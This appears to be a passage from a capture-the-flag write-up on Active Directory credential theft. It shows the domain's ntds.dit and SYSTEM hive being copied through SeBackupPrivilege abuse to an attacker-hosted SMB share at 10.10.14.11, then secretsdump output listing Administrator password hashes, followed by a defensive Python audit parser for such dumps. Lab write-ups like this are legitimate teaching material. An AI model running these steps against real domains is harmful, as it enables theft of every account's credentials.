➜ www impacket-smbserver s . -smb2support -username ctf -password lover
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
windows->
*Evil-WinRM* PS C:\programdata\temp> net use S: \\10.10.14.11\s /user:ctf lover
The command completed successfully.
Copied the ntds.dit file to my machine.
*Evil-WinRM* PS C:\programdata\temp> Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit \\10.10.14.11\s\ntds.ditt
I'll also need the SYSTEM registry file
reg save hklm\system system.hive
Download the system.hive to Kali.
➜ www impacket-secretsdump -ntds ntds.dit -system system.hive -history LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:7f1e4ff8c6a8e6b6fcae2d9c0572cd62:::
Administrator_history1:500:aad3b435b51404eeaad3b435b51404ee:ac2983b6afa7bdea9360fa7a95e31855:::
Administrator_history2:500:aad3b435b51404eeaad3b435b51404ee:a47feb765cf90d3216423e9cfedea565:::
Administrator_history3:500:aad3b435b51404eeaad3b435b51404ee:24958cffdd2aa3125c63c3fd374db44b:::
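
The `domain\uid:rid:lmhash:nthash` rows above are also the input a defender's password audit works from. As an added example (not part of the original writeup or of Impacket), this Python parser groups the rows per account, folding `_historyN` rows into their account, and flags stored LM hashes, blank passwords and hash reuse; the function names, finding labels and sample accounts are assumptions made for illustration.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string (no LM hash stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string (blank password)
ROW = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)
HIST = re.compile(r"^(.+)_history(\d+)$")  # assumes no real account name ends in _historyN

def parse(text):
    """Group name:rid:lmhash:nthash::: rows per account; other lines are skipped."""
    accounts = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # banner or [*] status line
        name, rid, lm, nt = m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4).lower()
        h = HIST.match(name)
        acct = accounts.setdefault(h.group(1) if h else name, {"rid": rid, "current": None, "history": []})
        if h:
            acct["history"].append((lm, nt))
        else:
            acct["current"] = (lm, nt)
    return accounts

def audit(accounts):
    """Return sorted (account, finding) pairs for weak storage and hash reuse."""
    findings, owners = [], defaultdict(set)
    for name, acct in accounts.items():
        if acct["current"] is None:
            continue  # only history rows were seen for this account
        lm, nt = acct["current"]
        if lm != EMPTY_LM:
            findings.append((name, "lm-hash-stored"))
        if nt == EMPTY_NT:
            findings.append((name, "blank-password"))
        if any(old == nt for _, old in acct["history"]):
            findings.append((name, "current-password-in-history"))
        owners[nt].add(name)
    # The same NT hash on several accounts means the same password on each.
    findings.extend((n, "password-shared") for names in owners.values() if len(names) > 1 for n in names)
    return sorted(findings)

# Constructed sample rows (not from the page); the hashes are filler hex.
A, B, C, D = "a" * 32, "b" * 32, "c" * 32, "d" * 32
SAMPLE = "\n".join([
    "[*] Reading and decrypting hashes from ntds.dit",
    f"alice:1103:{EMPTY_LM}:{A}:::", f"alice_history0:1103:{EMPTY_LM}:{B}:::",
    f"alice_history1:1103:{EMPTY_LM}:{A}:::", f"bob:1104:{EMPTY_LM}:{A}:::",
    f"carol:1105:{C}:{D}:::", f"guestsvc:1106:{EMPTY_LM}:{EMPTY_NT}:::",
])
```

`audit(parse(SAMPLE))` returns one `(account, finding)` pair per issue, which makes the result easy to feed into a report of accounts that need a password reset or a policy fix.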